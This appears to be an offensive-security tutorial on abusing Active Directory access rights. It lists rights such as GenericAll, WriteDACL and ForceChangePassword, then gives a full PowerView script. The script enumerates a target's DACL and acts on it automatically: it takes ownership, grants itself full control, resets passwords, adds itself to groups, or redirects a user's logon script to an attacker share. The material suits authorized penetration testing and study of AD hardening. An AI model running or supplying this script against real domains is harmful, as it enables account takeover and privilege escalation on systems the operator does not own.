ACLs/ACEs
Active Directory objects such as users and groups are securable objects: each carries a security descriptor whose DACL is a list of ACEs defining which principals can read or modify the object (e.g. change the account name, reset the password, add members).
Some of the Active Directory object access rights that we, as attackers, are interested in:
GenericAll - full rights to the object (e.g. add users to a group or reset a user's password)
GenericWrite - update the object's attributes (e.g. the logon script path)
WriteOwner - change the object's owner to an attacker-controlled principal; the owner can then rewrite the DACL and take over the object
WriteDACL - modify the object's ACEs, e.g. add an ACE granting the attacker full control over the object
AllExtendedRights - all extended rights on the object; on a user this includes User-Force-Change-Password, i.e. resetting the password without knowing the current one
ForceChangePassword - reset a user's password without knowing the current one (the User-Force-Change-Password extended right)
Self (Self-Membership) - add yourself to a group (a validated write to the group's member attribute)
[Figure: example of enumerating ACLs in Active Directory. The annotated points in the screenshot are: (1) the target object (a user); (2) the principal that has access to that object; (3) the access type, here "GenericAll", which means excessive rights. Rights groups called out in the figure: (GenericAll, ForceChangePassword, AllExtendedRights) and (GenericAll, GenericWrite).]
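The following is an added example, not code from the original page or from PowerView itself. It puts the list of rights above and the enumeration shown in the figure together: it dumps the DACL of one object with PowerView, keeps the allow ACEs held by the principal we control, and acts on the first abusable right. It assumes PowerView.ps1 (the PowerSploit Recon module) is already dot-sourced, and that `lowpriv`, `targetobj`, the password and the UNC path are hypothetical values for a hypothetical domain.

```powershell
# Added example (not from the original page). Assumes PowerView.ps1 is
# dot-sourced in this session. 'lowpriv' (principal we control) and
# 'targetobj' (user or group we want) are hypothetical names.

$Attacker = 'lowpriv'
$Target   = 'targetobj'

# Step 1: enumerate the DACL of the target. -ResolveGUIDs turns the GUIDs of
# extended rights / properties into names (User-Force-Change-Password,
# Member, ...) so ObjectAceType is readable. For a domain-wide scan instead:
#   Find-InterestingDomainAcl -ResolveGUIDs | ? { $_.IdentityReferenceName -eq $Attacker }
$aces = Get-DomainObjectAcl -Identity $Target -ResolveGUIDs |
    Select-Object @{ n = 'Principal'; e = { ConvertFrom-SID $_.SecurityIdentifier } },
                  ActiveDirectoryRights, ObjectAceType, AceType

$aces | Format-Table -AutoSize   # same columns as the table in the figure

# Step 2: keep only allow ACEs granted to the principal we control.
# ConvertFrom-SID returns DOMAIN\name, hence the '*\' prefix in the pattern.
$mine = $aces | Where-Object {
    $_.AceType -match 'AccessAllowed' -and $_.Principal -like "*\$Attacker"
}
if (-not $mine) { Write-Warning "$Attacker holds no ACE on $Target"; return }

# Password reset only makes sense on a user; adding a member only on a group.
$isGroup = (Get-DomainObject -Identity $Target -Properties objectclass).objectclass -contains 'group'

function Take-Over {
    # Reached once we hold GenericAll, directly or after rewriting the DACL.
    if ($isGroup) {
        Add-DomainGroupMember -Identity $Target -Members $Attacker
    } else {
        $pw = ConvertTo-SecureString 'Hypothetical-Pass-123!' -AsPlainText -Force
        Set-DomainUserPassword -Identity $Target -AccountPassword $pw
    }
}

# Step 3: act on the first abusable right. ActiveDirectoryRights is a flags
# value ("WriteProperty, ExtendedRight"), so match on substrings. The labeled
# break leaves the foreach, not just the switch.
:aceLoop foreach ($ace in $mine) {
    $rights = [string]$ace.ActiveDirectoryRights
    switch -Regex ($rights) {
        'GenericAll' {
            Take-Over; break aceLoop
        }
        'WriteDacl' {
            # Add an ACE granting ourselves full control, then take over.
            Add-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Attacker -Rights All
            Take-Over; break aceLoop
        }
        'WriteOwner' {
            # The owner can always rewrite the DACL: take ownership first.
            Set-DomainObjectOwner -Identity $Target -OwnerIdentity $Attacker
            Add-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Attacker -Rights All
            Take-Over; break aceLoop
        }
        'ExtendedRight' {
            # AllExtendedRights (ObjectAceType 'All' or absent) or the single
            # User-Force-Change-Password right: reset without the old password.
            if (-not $isGroup -and
                (-not $ace.ObjectAceType -or $ace.ObjectAceType -in @('All', 'User-Force-Change-Password'))) {
                Take-Over; break aceLoop
            }
        }
        'GenericWrite|WriteProperty' {
            if ($isGroup -and (-not $ace.ObjectAceType -or $ace.ObjectAceType -in @('All', 'Member'))) {
                # Write access to the member attribute: add ourselves.
                Add-DomainGroupMember -Identity $Target -Members $Attacker; break aceLoop
            }
            if (-not $isGroup -and $rights -match 'GenericWrite') {
                # GenericWrite on a user: point the logon script at a share we control
                # (hypothetical path).
                Set-DomainObject -Identity $Target -Set @{ scriptpath = '\\attacker\share\run.bat' }
                break aceLoop
            }
        }
        'Self' {
            # Self-Membership: validated write to member, add ourselves.
            if ($isGroup) { Add-DomainGroupMember -Identity $Target -Members $Attacker; break aceLoop }
        }
    }
}
```

The order of the switch clauses matters: GenericAll is checked first because it implies every other right, and WriteDacl/WriteOwner are turned into GenericAll before acting so the follow-up is the same code path as the figure's "excessive" GenericAll case. Every write here is logged as a directory change (password reset, DACL or owner change, group membership change), so on a real engagement run the enumeration part first and act only on the right that is actually present.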